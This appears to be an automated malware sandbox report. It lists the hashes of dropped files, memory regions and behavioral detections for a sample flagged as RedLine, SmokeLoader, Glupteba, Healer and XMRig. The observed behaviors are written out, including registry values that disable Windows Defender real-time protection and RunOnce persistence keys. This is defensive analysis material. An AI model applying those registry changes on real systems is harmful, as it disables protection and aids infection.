SHA512 7e4816c43e0addba088709948e8aedc9e39d6802c74a75cfbc2a0e739b44c5b5eef2bb2453b7032c758b0bdb38e4e7a598aa29be015796361b81d7f9e8027796

memory/940-592-0x00000000011E0000-0x00000000013B8000-memory.dmp

memory/2116-593-0x0000000000400000-0x000000000045A000-memory.dmp

memory/2116-591-0x0000000000400000-0x000000000045A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\pucq4vc\imagestore.dat

MD5 099c1d176a95ddf134a0e892dc9d51bf
SHA1 c554bc14d47ccd595932717120759f8f7bc4a386
SHA256 38c7ac3b6a4aaf3a63b874c9f7bfce09f478cf9b9b710a3f97c9c1cdbc9a5113
SHA512 a761a9e82e8ae5e1b160dfa8c6ca38a4db6608896ea78c38f0dc3cb54355093fdbbb458d2b2f5452392ddddc8ab7c69edd3d60169092d9e96bdf66340191183e

C:\Users\Admin\AppData\Local\Temp\kos1.exe

MD5 85b698363e74ba3c08fc16297ddc284e
SHA1 171cfea4a82a7365b241f16aebdb2aad29f4f7c0
SHA256 78efcbb0c6eb6a4c76c036adc65154b8ff028849f79d508e45babfb527cb7cfe
SHA512 7e4816c43e0addba088709948e8aedc9e39d6802c74a75cfbc2a0e739b44c5b5eef2bb2453b7032c758b0bdb38e4e7a598aa29be015796361b81d7f9e8027796

memory/1616-610-0x0000000000010000-0x0000000000184000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\pucq4vc\imagestore.dat

MD5 7bd69ccb746dcf97336a6a8c368dad12
SHA1 5e491b93c6117f2b91d56aa06222926657a442f9
SHA256 cc02a6b15efbfe620ba77d61de11d49faea0ef32164c44cf4cc0ffaf923d0653
SHA512 de67da45d03668cf3e8de06344e71d59ec86d423922d0a1afea513897ab01fcd2bb0a9d012355016410bbca7b5ae77a40ac46bb8750a820998a33348dcbebb51

memory/1976-612-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

memory/1616-613-0x0000000070BD0000-0x00000000712BE000-memory.dmp

memory/2116-614-0x0000000070BD0000-0x00000000712BE000-memory.dmp

memory/1604-618-0x0000000003340000-0x00000000034B1000-memory.dmp

memory/1604-619-0x00000000034C0000-0x00000000035F1000-memory.dmp

memory/1976-620-0x00000000022C0000-0x00000000023A2000-memory.dmp

memory/1976-621-0x000000001BCF0000-0x000000001BD70000-memory.dmp

memory/2116-623-0x0000000007500000-0x0000000007540000-memory.dmp

memory/1620-624-0x0000000000220000-0x000000000027A000-memory.dmp

memory/1620-625-0x0000000000400000-0x0000000000469000-memory.dmp

memory/1976-627-0x0000000002630000-0x0000000002700000-memory.dmp

\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

memory/1976-635-0x0000000002520000-0x000000000256C000-memory.dmp

memory/1596-640-0x0000000000400000-0x0000000000413000-memory.dmp

\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

memory/1044-649-0x00000000008E0000-0x00000000008E8000-memory.dmp

memory/1976-650-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

memory/1044-651-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

memory/1044-652-0x000000001B070000-0x000000001B0F0000-memory.dmp

memory/1616-653-0x0000000070BD0000-0x00000000712BE000-memory.dmp

memory/2116-654-0x0000000070BD0000-0x00000000712BE000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp

MD5 2fba5642cbcaa6857c3995ccb5d2ee2a
SHA1 91fe8cd860cba7551fbf78bc77cc34e34956e8cc
SHA256 ddec51f3741f3988b9cc792f6f8fc0dfa2098ef0eb84c6a2af7f8da5a72b40fa
SHA512 30613b43427d17115134798506f197c0f5f8b2b9f247668fa25b9dd4853bbd97ac1e27f4e3325dec4f6dfc0e448ebbddb2969ad1a1781aa59ebf522d436aed7c

C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp

MD5 2fba5642cbcaa6857c3995ccb5d2ee2a
SHA1 91fe8cd860cba7551fbf78bc77cc34e34956e8cc
SHA256 ddec51f3741f3988b9cc792f6f8fc0dfa2098ef0eb84c6a2af7f8da5a72b40fa
SHA512 30613b43427d17115134798506f197c0f5f8b2b9f247668fa25b9dd4853bbd97ac1e27f4e3325dec4f6dfc0e448ebbddb2969ad1a1781aa59ebf522d436aed7c

C:\Users\Admin\AppData\Local\Temp\is-9O3R8.tmp\is-AOGQ0.tmp

MD5 2fba5642cbcaa6857c3995ccb5d2ee2a
SHA1 91fe8cd860cba7551fbf78bc77cc34e34956e8cc
SHA256 ddec51f3741f3988b9cc792f6f8fc0dfa2098ef0eb84c6a2af7f8da5a72b40fa
SHA512 30613b43427d17115134798506f197c0f5f8b2b9f247668fa25b9dd4853bbd97ac1e27f4e3325dec4f6dfc0e448ebbddb2969ad1a1781aa59ebf522d436aed7c

memory/1604-660-0x00000000034C0000-0x00000000035F1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 87f6902f08b2c913e6eb9ef12675df8e
SHA1 43f2e9f7948056ec2780bacdd967b7e9f5cd5366
SHA256 e3a3cd942411a1b75f34463f5ae30ca6e5222dee465e5916cf26975d461af819
SHA512 c4a12a573bb3ef7ff0eca3808c0b500b35a693c378c56094e447832de98ba694aab2fb2dd77dfd6f89d5d7057437f0cae03ef6d059d6f221eead6ccc34f9e191

memory/1976-661-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-FMRLL.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-FMRLL.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-FMRLL.tmp\_isetup\_isdecmp.dll

MD5 b4786eb1e1a93633ad1b4c112514c893
SHA1 734750b771d0809c88508e4feb788d7701e6dada
SHA256 2ae4169f721beb389a661e6dbb18bc84ef38556af1f46807da9d87aec2a6f06f
SHA512 0882d2aa163ece22796f837111db0d55158098035005e57cd2e9b8d59dc2e582207840bf98bee534b81c368acf60ab5d8ecbe762209273bda067a215cdb2c0c6

\Users\Admin\AppData\Local\Temp\is-FMRLL.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/1620-883-0x0000000070BD0000-0x00000000712BE000-memory.dmp

\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

C:\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

\Users\Admin\AppData\Local\Temp\5D03.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

memory/2116-960-0x0000000007500000-0x0000000007540000-memory.dmp

\Program Files (x86)\PA Previewer\previewer.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

memory/1596-973-0x0000000000400000-0x0000000000413000-memory.dmp

memory/2348-976-0x00000000036E0000-0x00000000038D1000-memory.dmp

memory/328-977-0x0000000000C70000-0x0000000000E61000-memory.dmp

memory/328-978-0x0000000000C70000-0x0000000000E61000-memory.dmp

memory/1044-979-0x000007FEF59F0000-0x000007FEF63DC000-memory.dmp

memory/328-980-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1044-981-0x000000001B070000-0x000000001B0F0000-memory.dmp

memory/328-982-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/2348-984-0x0000000000400000-0x00000000004B0000-memory.dmp

memory/328-985-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1620-986-0x0000000070BD0000-0x00000000712BE000-memory.dmp

memory/328-987-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/2580-988-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/2580-989-0x0000000000BC0000-0x0000000000DB1000-memory.dmp

memory/2580-990-0x0000000000BC0000-0x0000000000DB1000-memory.dmp

memory/2348-991-0x00000000036E0000-0x00000000038D1000-memory.dmp

memory/892-992-0x0000000000220000-0x0000000000235000-memory.dmp

memory/892-994-0x0000000000240000-0x0000000000249000-memory.dmp

memory/2616-993-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2616-996-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2116-998-0x0000000070BD0000-0x00000000712BE000-memory.dmp

memory/2156-999-0x0000000002680000-0x0000000002A78000-memory.dmp

memory/2616-997-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2156-1000-0x0000000002A80000-0x000000000336B000-memory.dmp

memory/2156-1001-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2580-1002-0x0000000000400000-0x00000000005F1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 19a262bb7a7e5f0599c2fba59a167a2d
SHA1 2a90286cca74e25628c3eb744e148948ba9111a0
SHA256 dd32e8c257b31f21822e6e6d372219763fc6e4178fe1f8f2253ef230717dd890
SHA512 6d1e2225be648fc545415c06e646c873b48eb4cfeeb30c9f226c420f2d9fff01f5b4502e8f3473d1a8bb049c189d79ff15721b3313e78f36c621f0a627dea8f9

memory/2580-1069-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/2156-1070-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2156-1071-0x0000000002A80000-0x000000000336B000-memory.dmp

memory/2156-1072-0x0000000002680000-0x0000000002A78000-memory.dmp

memory/1196-1073-0x0000000002E00000-0x0000000002E16000-memory.dmp

memory/2616-1074-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1944-1082-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1944-1088-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1028-1105-0x0000000002750000-0x0000000002B48000-memory.dmp

memory/1028-1106-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2484-1113-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/2484-1120-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2580-1136-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1028-1176-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1028-1178-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8BT23REO\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

memory/2580-1209-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1028-1210-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2580-1213-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1028-1214-0x0000000000400000-0x0000000000D1B000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-09-23 19:33

Reported

2023-09-23 19:36

Platform

win10v2004-20230915-en

Max time kernel

151s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8C3E.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos1.exe N/A

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v8598647.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\v2484984.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\f6cbadd1b54e99b4555c3db5566df1c4a0fb50ef8b198e020126ce8006dd6b66_JC.exe N/A

Checks installed software on the system

discovery

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\PA Previewer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-GBVM0.tmp C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-MFM1O.tmp C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-FT0JL.tmp C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp N/A
File created C:\Program Files (x86)\PA Previewer\is-R531G.tmp C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp N/A
File opened for modification C:\Program Files (x86)\PA Previewer\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp N/A
File opened for modification C:\Program Files (x86)\PA Previewer\previewer.exe C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
